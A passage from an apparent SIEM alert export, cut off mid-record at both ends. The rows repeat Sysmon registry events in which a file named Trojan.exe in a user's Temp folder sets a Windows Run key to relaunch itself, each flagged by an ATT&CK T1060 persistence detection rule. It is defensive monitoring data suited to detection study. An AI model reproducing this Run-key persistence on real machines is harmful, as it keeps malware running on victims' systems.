HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:12.684"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:24.888",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:11.670 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:11.684162400Z"",""eventRecordID"":""1289"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:11.670\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:11.670"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:24.826",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:10.654 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:10.658846000Z"",""eventRecordID"":""1286"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:10.654\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:10.654"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:24.764",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:09.637 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:09.658052300Z"",""eventRecordID"":""1284"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:09.637\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:09.637"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:21.812",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:08.575 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:08.581124200Z"",""eventRecordID"":""1283"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:08.575\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:08.575"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:20.685",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:07.560 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:07.561760100Z"",""eventRecordID"":""1282"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:07.560\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:07.560"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:19.670",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:06.543 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:06.560331500Z"",""eventRecordID"":""1280"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:06.543\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:06.543"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:18.669",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:05.541 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:05.552989500Z"",""eventRecordID"":""1279"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:05.541\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:05.541"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:17.685",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:04.493 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:04.501240100Z"",""eventRecordID"":""1278"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:04.493\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:04.493"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:16.541",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:03.200 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:03.203454900Z"",""eventRecordID"":""1277"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:03.200\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:03.200"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:15.310",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:02.185 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:02.200336000Z"",""eventRecordID"":""1276"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:02.185\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:02.185"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:14.310",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:01.174 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:01.175922700Z"",""eventRecordID"":""1275"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:01.174\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 